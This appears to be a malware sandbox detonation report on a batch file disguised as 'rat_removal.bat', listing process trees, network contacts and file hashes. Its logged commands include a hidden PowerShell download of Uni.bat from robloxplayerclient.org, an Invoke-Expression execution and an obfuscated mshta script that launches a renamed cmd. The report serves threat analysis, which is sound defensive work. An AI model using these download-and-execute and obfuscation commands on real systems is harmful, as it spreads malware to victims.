PID 3252 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 4472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 4472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 4124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 4124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 4652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 4652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3252 wrote to memory of 3260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3252 wrote to memory of 3260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3252 wrote to memory of 2996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3252 wrote to memory of 2996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3252 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3252 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3252 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 5016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 5016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3028 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"

C:\Windows\system32\chcp.com

chcp.com 437

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c type tmp

C:\Windows\system32\findstr.exe

findstr /L /I set C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\find.exe

find

C:\Windows\system32\find.exe

find

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c type tmp

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://robloxplayerclient.org/Uni.bat' -OutFile: 'C:\Users\Admin\AppData\Local\Temp\Uni.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Uni.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OWMmhUSKSJ; "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jKiXOIbCnNURqPPCCxgw4312:MtFhlUnv=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-jKiXOIbCnNURqPPCCxgw4312:MtFhlUnv=%

Network

Country Destination Domain Proto
US 8.8.8.8:53 robloxplayerclient.org udp
US 172.67.137.17:443 robloxplayerclient.org tcp
US 8.8.8.8:53 17.137.67.172.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\tmp

MD5 ce585c6ba32ac17652d2345118536f9c
SHA1 be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256 589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512 d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gbaqd0ga.5jc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1996-12-0x000001C8CD5C0000-0x000001C8CD5E2000-memory.dmp

memory/1996-13-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/1996-14-0x000001C8B4F20000-0x000001C8B4F30000-memory.dmp

memory/1996-15-0x000001C8B4F20000-0x000001C8B4F30000-memory.dmp

memory/1996-16-0x000001C8B4F20000-0x000001C8B4F30000-memory.dmp

memory/1996-20-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Uni.bat

MD5 7b10ed9636b737ceadbb064086ff94ca
SHA1 de075e9898da93e3ebb17b86240716ef44df3574
SHA256 19086f3bc2b071cf02d549551dae87f5baa0eee53305881d77b25a9be9e4e1ad
SHA512 2bcd2d8f188498b577aedcb8e017e3a24ce61e1933090d20fbbfacca90bf5b3e4a2a9b213a479bd19a0aedf622f6ffa08f042b40bc73f66c8c1534966d5b9eeb

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

memory/2444-31-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/2444-32-0x000002B9EC4C0000-0x000002B9EC4D0000-memory.dmp

memory/2444-33-0x000002B9EC4C0000-0x000002B9EC4D0000-memory.dmp

memory/2444-34-0x000002B9ECA40000-0x000002B9ECA86000-memory.dmp

memory/2444-35-0x000002B9F4C70000-0x000002B9F571C000-memory.dmp

memory/2444-36-0x00007FFB420A0000-0x00007FFB422A9000-memory.dmp

memory/2444-37-0x00007FFB420A0000-0x00007FFB422A9000-memory.dmp

memory/2444-38-0x000002B9F5720000-0x000002B9F620C000-memory.dmp

memory/2444-39-0x00007FFB420A0000-0x00007FFB422A9000-memory.dmp

memory/2444-41-0x00007FFB40EC0000-0x00007FFB40F7D000-memory.dmp

memory/2444-42-0x00007FFB420A0000-0x00007FFB422A9000-memory.dmp

memory/2444-43-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/2444-44-0x000002B9EC4C0000-0x000002B9EC4D0000-memory.dmp

memory/2444-45-0x000002B9EC4C0000-0x000002B9EC4D0000-memory.dmp

memory/2444-46-0x00007FFB420A0000-0x00007FFB422A9000-memory.dmp

memory/2444-47-0x000002B9F65E0000-0x000002B9F66DC000-memory.dmp

memory/2444-48-0x000002B9EC7C0000-0x000002B9EC7E2000-memory.dmp

memory/2444-49-0x000002B9ECA00000-0x000002B9ECA06000-memory.dmp

memory/2444-50-0x000002B9F66E0000-0x000002B9F673E000-memory.dmp

memory/2444-51-0x000002B9F6740000-0x000002B9F6798000-memory.dmp

memory/2444-52-0x000002B9EC2D0000-0x000002B9EC2D6000-memory.dmp

memory/2444-53-0x000002B9ECA10000-0x000002B9ECA18000-memory.dmp

memory/2444-54-0x000002B9EC9F0000-0x000002B9EC9F6000-memory.dmp

memory/2444-55-0x000002B9F67A0000-0x000002B9F67DE000-memory.dmp

memory/2444-56-0x000002B9F67E0000-0x000002B9F740C000-memory.dmp

memory/2444-57-0x000002B9F7410000-0x000002B9F74C2000-memory.dmp

memory/2444-58-0x000002B9F74C0000-0x000002B9F74F6000-memory.dmp

memory/2444-59-0x000002B9F7500000-0x000002B9F7558000-memory.dmp

memory/2444-60-0x000002B9F7560000-0x000002B9F758E000-memory.dmp

memory/2444-61-0x00007FF7093F0000-0x00007FF70945E000-memory.dmp

memory/2444-63-0x000002B9ECA20000-0x000002B9ECA28000-memory.dmp

memory/2444-64-0x0000000180000000-0x0000000180007000-memory.dmp

memory/2444-67-0x00007FFB420A0000-0x00007FFB422A9000-memory.dmp

memory/2444-74-0x00007FFB206D8000-0x00007FFB206D9000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 356e04e106f6987a19938df67dea0b76
SHA1 f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA256 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512 df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

C:\Windows\$sxr-cmd.exe

MD5 c5db7b712f280c3ae4f731ad7d5ea171
SHA1 e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256 f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512 bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-14 05:24

Reported

2024-03-14 05:27

Platform

win10-20240221-en

Max time kernel

79s

Max time network

141s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\4272278488\3302449443.pri C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4896 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4896 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4896 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 3912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 3912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 4540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 4540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4896 wrote to memory of 4556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4896 wrote to memory of 4556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4896 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4896 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4896 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3412 wrote to memory of 8 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3412 wrote to memory of 8 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3412 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3412 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"

C:\Windows\system32\chcp.com

chcp.com 437

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c type tmp

C:\Windows\system32\findstr.exe

findstr /L /I set C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\find.exe

find

C:\Windows\system32\find.exe

find

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c type tmp

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://robloxplayerclient.org/Uni.bat' -OutFile: 'C:\Users\Admin\AppData\Local\Temp\Uni.bat'"

C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe

"C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Uni.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OWMmhUSKSJ; "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden

Network

Country Destination Domain Proto
US 8.8.8.8:53 robloxplayerclient.org udp
US 104.21.7.174:443 robloxplayerclient.org tcp
US 8.8.8.8:53 174.7.21.104.in-addr.arpa udp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 20.189.173.22:443 watson.telemetry.microsoft.com tcp
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 22.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\tmp

MD5 ce585c6ba32ac17652d2345118536f9c
SHA1 be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256 589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512 d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

memory/1160-8-0x0000028671340000-0x0000028671362000-memory.dmp

memory/1160-9-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

memory/1160-10-0x0000028671370000-0x0000028671380000-memory.dmp

memory/1160-11-0x0000028671370000-0x0000028671380000-memory.dmp

memory/1160-14-0x0000028671500000-0x0000028671576000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orwd3zkq.uw1.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1160-29-0x0000028671370000-0x0000028671380000-memory.dmp

memory/1160-39-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Uni.bat

MD5 6bdab73b1ae1fb7629bd9c250354a250
SHA1 24fa877ae0db1d2f1b24ce29ea8eddefddc4afc6
SHA256 e0fe368de1cd2f3f769182e24944f9e03e7d0483aded6dc27d20b53680ca67bb
SHA512 f721eff91fdce63097a12fa8a1cf6b48664ad2563439b03369c201c893e502e3a43191ded7782795d0ec84199307042afb8c89cfddfdb39b55286f558dc0357a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d737fc27bbf2f3bd19d1706af83dbe3f
SHA1 212d219394124968b50769c371121a577d973985
SHA256 b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
SHA512 974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

memory/1072-44-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

memory/1072-46-0x00000147B3530000-0x00000147B3540000-memory.dmp

memory/1072-48-0x00000147B3530000-0x00000147B3540000-memory.dmp

memory/1072-77-0x00000147B3BC0000-0x00000147B3BFC000-memory.dmp

memory/1072-96-0x00000147B3530000-0x00000147B3540000-memory.dmp

C:\Users\Admin\Desktop\New Compressed (zipped) Folder.zip

MD5 76cdb2bad9582d23c1f6f4d868218d6c
SHA1 b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA256 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA512 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

memory/1072-99-0x00000147FC270000-0x00000147FCD1C000-memory.dmp

memory/1072-100-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

memory/1072-101-0x00000147B3530000-0x00000147B3540000-memory.dmp

memory/1072-103-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

memory/1072-104-0x00000147FCD20000-0x00000147FD80C000-memory.dmp

memory/1072-107-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

memory/1072-109-0x00007FFABC490000-0x00007FFABC53E000-memory.dmp

memory/1072-108-0x00007FF7C0E50000-0x00007FF7C0EC0000-memory.dmp

memory/1072-110-0x00000147B3530000-0x00000147B3540000-memory.dmp

memory/1072-111-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

memory/1072-112-0x00000147B3530000-0x00000147B3540000-memory.dmp

memory/1072-113-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

memory/1072-132-0x00000147B3530000-0x00000147B3540000-memory.dmp

memory/1072-139-0x00007FF7C0E50000-0x00007FF7C0EC0000-memory.dmp

memory/1072-140-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

memory/1072-141-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

memory/1072-142-0x00007FFABC490000-0x00007FFABC53E000-memory.dmp